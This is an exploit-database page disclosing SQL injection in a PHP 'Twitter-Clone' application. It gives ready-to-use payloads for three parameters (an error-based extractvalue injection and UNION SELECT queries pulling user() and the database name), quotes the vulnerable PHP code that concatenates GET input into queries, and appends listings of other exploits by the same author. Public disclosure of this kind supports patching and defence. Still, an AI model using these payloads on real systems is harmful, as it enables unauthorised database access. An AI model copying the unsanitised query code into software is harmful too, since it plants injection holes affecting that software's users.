Menu

Search for hundreds of thousands of exploits

"Twitter-Clone 1 - 'code' SQL Injection"

Author

Exploit author

L0RD

Platform

Exploit platform

php

Release date

Exploit published date

2018-08-23

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
# Exploit Title: Twitter-Clone 1 - 'code' SQL Injection
# Date: 2018-08-22
# Exploit Author: L0RD
# Vendor Homepage: https://github.com/Fyffe/PHP-Twitter-Clone/
# Version: 1
# CVE: N/A
# Tested on: Win 10
# vulnerable files : [mailactivation.php , stalkers.php , search.php]
# vulnerable parameters : [name , code , id]

# 1) search.php :
# vulnerable parameter : name
# Type : Error-based
# Payload : 

%' AND extractvalue(1,concat(0x3a,database(),0x3a))%23

# vulnerable code :
if($_GET['name']!=""){
$what = $_GET['name'];
include "connect.php";
$users = mysqli_query($con, "SELECT id, username, followers, following,
tweets
  FROM users
 WHERE username LIKE '%$what%'
 ORDER BY username ASC
 LIMIT 0, 10
");

# 2) mailactivation.php :
# vulnerable parameter : code
# Type : Union query
# Payload : 

' UNION SELECT 1,user(),3,4,5,6%23

# vulnerable code :
include "connect.php";
$givenname = $_GET['username'];
$givencode = $_GET['code'];
$query = mysqli_query($con, "SELECT code, active
  FROM users
  WHERE code = '$givencode' AND username = '$givenname'
 ");
$row = mysqli_fetch_assoc($query);
$wantedcode = $row['code'];

# 3) stalkers.php :
# vulnerable parameter : id
# Type : Union query
# Payload : 

' UNION SELECT 1,2,user(),4,5,6

# vulnerable code :
if ($_GET['id'] != "") {
$theid = $_GET['id'];
include "connect.php";
$stalked = mysqli_query($con, "SELECT id, username, followers, following
 FROM users
  WHERE id = '$theid'
");
$row1 = mysqli_fetch_assoc($stalked);
$usern = $row1['username'];
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2018-09-05 "Microsoft People 10.1807.2131.0 - Denial of service (PoC)" dos windows_x86-64 L0RD
2018-08-30 "Nord VPN 6.14.31 - Denial of Service (PoC)" dos windows_x86-64 L0RD
2018-08-29 "NASA openVSP 3.16.1 - Denial of Service (PoC)" dos windows_x86-64 L0RD
2018-08-27 "Firefox 55.0.3 - Denial of Service (PoC)" dos windows_x86-64 L0RD
2018-08-23 "Twitter-Clone 1 - 'code' SQL Injection" webapps php L0RD
2018-08-21 "Twitter-Clone 1 - 'userid' SQL Injection" webapps php L0RD
2018-08-21 "Twitter-Clone 1 - Cross-Site Request Forgery (Delete Post)" webapps php L0RD
2018-07-11 "Instagram-Clone Script 2.0 - Cross-Site Scripting" webapps php L0RD
2018-07-04 "ShopNx - Arbitrary File Upload" webapps php L0RD
2018-07-04 "Online Trade - Information Disclosure" webapps php L0RD
2018-06-18 "Joomla! Component Jomres 9.11.2 - Cross-Site Request Forgery (Add User)" webapps php L0RD
2018-06-12 "Joomla! Component EkRishta 2.10 - 'username' SQL Injection" webapps php L0RD
2018-06-07 "WampServer 3.0.6 - Cross-Site Request Forgery" webapps php L0RD
2018-06-03 "Smartshop 1 - Cross-Site Request Forgery" webapps php L0RD
2018-06-03 "Smartshop 1 - 'id' SQL Injection" webapps php L0RD
2018-05-29 "Facebook Clone Script 1.0.5 - Cross-Site Request Forgery" webapps php L0RD
2018-05-29 "Facebook Clone Script 1.0.5 - 'search' SQL Injection" webapps php L0RD
2018-05-28 "Joomla! Component jCart for OpenCart 2.3.0.2 - Cross-Site Request Forgery" webapps php L0RD
2018-05-28 "Joomla! Component JoomOCShop 1.0 - Cross-Site Request Forgery" webapps php L0RD
2018-05-28 "Joomla! Component Full Social 1.1.0 - 'search_query' SQL Injection" webapps php L0RD
2018-05-24 "Timber 1.1 - Cross-Site Request Forgery" webapps php L0RD
2018-05-23 "eWallet Online Payment Gateway 2 - Cross-Site Request Forgery" webapps php L0RD
2018-05-23 "Mcard Mobile Card Selling Platform 1 - SQL Injection" webapps php L0RD
2018-05-23 "Mobile Card Selling Platform 1 - Cross-Site Request Forgery" webapps php L0RD
2018-05-22 "Auto Car 1.2 - 'car_title' SQL Injection / Cross-Site Scripting" webapps php L0RD
2018-05-22 "Zechat 1.5 - SQL Injection / Cross-Site Request Forgery" webapps php L0RD
2018-05-22 "iSocial 1.2.0 - Cross-Site Scripting / Cross-Site Request Forgery" webapps php L0RD
2018-05-21 "Auto Dealership & Vehicle Showroom WebSys 1.0 - Multiple Vulnerabilities" webapps php L0RD
2018-05-21 "Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - Cross-Site Scripting / Cross-Site Request Forgery" webapps php L0RD
2018-05-21 "Private Message PHP Script 2.0 - Cross-Site Scripting" webapps php L0RD
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.